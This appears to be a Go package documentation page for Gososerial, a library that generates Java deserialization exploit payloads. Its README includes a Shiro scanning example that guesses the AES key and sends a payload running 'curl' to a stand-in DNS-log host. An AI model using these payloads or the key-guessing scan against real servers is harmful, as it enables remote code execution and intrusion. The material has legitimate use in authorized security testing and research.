gososerial

package module
v0.0.0-...-3a047d9 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Mar 21, 2022 License: Apache-2.0 Imports: 1 Imported by: 0

README

Gososerial

介绍

  • 参考著名安全工具xray的代码

  • ysoserial是java反序列化安全方面著名的工具

  • 从二进制层面解析,无需java环境,无需下载ysoserial.jar

  • 输入命令直接获得payload,方便编写安全工具

  • 目前已支持CC1-CC7,K1-K4和CB1链

  • 支持K1和K2的TomcatEcho,HTTP头可自行取名

Quick Start

  • download and import
go get github.com/4ra1n/Gososerial
  • example
package main

import (
	"fmt"
	gososerial "github.com/4ra1n/Gososerial"
)

func main() {
	var payload []byte
	payload = gososerial.GetCC1("calc.exe")
	fmt.Println(payload)
}
  • how to use tomcat echo
package main

import (
	gososerial "github.com/4ra1n/Gososerial"
	"..."
)

func main() {
	// Testecho: expr 10 '*' 10 -> Testecho: expr 10 '*' 10
	// Testcmd: expr 10 '*' 10 -> Testcmd: 100
	payload := gososerial.GetCCK2TomcatEcho("Testecho", "Testcmd")

	req.Cookie = AESEncrypt(payload)
	req.Header["Testecho"] = "gososerial"
	req.Method = "POST"
	resp := httputil.sendRequest(req)

	if resp.Header["Testecho"] == "gososerial" {
		log.Info("find cck2 tomcat echo")
	}
}
  • shiro scan example
package main

import (
	gososerial "github.com/4ra1n/Gososerial"
	"..."
)

func main() {
	// Shiro Scan Code
	target := "http://shiro_ip/"
	// Brust Shiro AES Key 
	key := shiro.CheckShiroKey(target)
	if key != nil {
		log.Info("find key: %s", key)
	}
	// Use CommonsCollections5 Payload
	var payload []byte
	payload = gososerial.GetCC5("curl xxxxx.ceye.io")
	// Send Cookies Encrypted By AES
	shiro.SendPayload(key, payload, target)
	// Receive Results Using Dnslog API
	if ceye.CheckResult("your_ceye_token") {
		log.Info("find shiro!")
	}
}

注意:测试打印false说明正常,并不是错误,因为我对类名等信息进行随机

命令行 (不完善)

  • CommonsCollections1

  • 支持列表

感谢

参考xray作者phith0n和koalr师傅的代码

免责申明

未经授权许可使用Gososerial攻击目标是非法的

本程序应仅用于授权的安全测试与研究目的

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func GetAllNames

func GetAllNames() []string

func GetCB1

func GetCB1(cmd string) []byte

func GetCC1

func GetCC1(cmd string) []byte

func GetCC2

func GetCC2(cmd string) []byte

func GetCC3

func GetCC3(cmd string) []byte

func GetCC4

func GetCC4(cmd string) []byte

func GetCC5

func GetCC5(cmd string) []byte

func GetCC6

func GetCC6(cmd string) []byte

func GetCC7

func GetCC7(cmd string) []byte

func GetCCK1

func GetCCK1(cmd string) []byte

func GetCCK1TomcatEcho

func GetCCK1TomcatEcho(echoHeaderName, cmdHeaderName string) []byte

func GetCCK2

func GetCCK2(cmd string) []byte

func GetCCK2TomcatEcho

func GetCCK2TomcatEcho(echoHeaderName, cmdHeaderName string) []byte

func GetCCK3

func GetCCK3(cmd string) []byte

func GetCCK4

func GetCCK4(cmd string) []byte

Types

This section is empty.

Directories

Path Synopsis
ysoserial

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL